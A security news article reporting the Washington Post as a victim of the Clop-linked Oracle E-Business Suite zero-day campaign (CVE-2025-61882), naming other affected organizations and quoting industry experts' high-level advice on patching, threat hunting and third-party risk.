Washington Post among breach victims in Oracle EBS zero-day attacks

The Washington Post reportedly confirmed Nov. 6 that it is one of the victims in the wave of Oracle E-Business Suite (EBS) zero-day attacks.

These attacks are believed to revolve around data leaks and extortion at the hands of the FIN11 ransomware gang.

SC Media reported on Oct. 28 that while not proven yet, security pros theorize that the financially motivated threat group FIN11 is behind the attacks, mainly because they are known to frequently deploy Clop ransomware.

News of the Oracle EBS attack on the Washington Post comes not long after Clop posted on its leak site that the high-profile newspaper was among its victims.

The list of known victims is growing: Harvard University had more than one terabyte of stolen data published last month, and major companies such as Schneider Electric also confirmed a leak close to 3 TB.

Other organizations affected include Envoy Air, a subsidiary of American Airlines, South Africa’s Wits University, and Emerson.

“Many haven't been disclosed yet because Clop tends to wait a few weeks before posting data to put pressure on ransom payments,” said Certis Foster, senior threat hunter lead at Deepwatch.  

Foster said security teams should first verify that their Oracle EBS servers are patched for the 9.8 critical CVE-2025-61882. And second, hunt backwards from August for signs that the organization was already hit, since exploitation started a few months back before victims were notified.

“Keep an eye out for unusual activity on your Oracle EBS servers, such as outbound data transfers, suspicious account access, and bash shells spawned from Java processes running under the ‘applmgr’ account,” said Foster. “The actor stole credentials and hid inside systems for months before sending ransom demands. We can't ignore that.”

Shane Barney, chief information security officer at Keeper Security, added that the breach linked to Oracle’s E-Business Suite platform highlights a growing shift in how attackers operate. Instead of targeting individual organizations, Barney said threat actors now focus on the shared platforms that underpin entire industries.

“By compromising one widely used system, they can reach dozens of victims at once, exploiting the trust those services hold,” said Barney.

“The reality is that third-party platforms are now part of every organization’s attack surface. The priority should be understanding where these systems connect internally, what data and credentials they have access to and how those connections are secured. Visibility into those dependencies allows teams to contain exposure quickly and limit downstream impact.”

Heath Renfrow, co-founder and chief information security officer, at Fenix24, said the expanding list of confirmed victims reinforces what we’ve been warning about for months: this Oracle E-Business Suite campaign is not a single-event compromise — it's an expansive supply chain intrusion affecting highly trusted systems at scale.

“Once attackers get a foothold in ERP environments like EBS, they gain privileged access to financial data, HR records, supplier systems, and core operational workflows. These platforms often sit at the center of business operations and are historically under-monitored compared to perimeter systems, which means adversaries can dwell silently and exfiltrate data before anyone notices.”

Damon Small, board member at Xcape, Inc., added that the inclusion of the Washington Post among Oracle EBS attack victims, underscores the campaign's wide reach and high stakes, targeting vital data across various industries.

"With the likely goal of large-scale data theft, teams need to operate under the assumption that their EBS environments have been compromised and prioritize forensic investigation, not just patching," said Small. Of particular concern is that data stolen from Schneider Electric could lead to future attacks against proprietary industrial control systems (ICS) devices."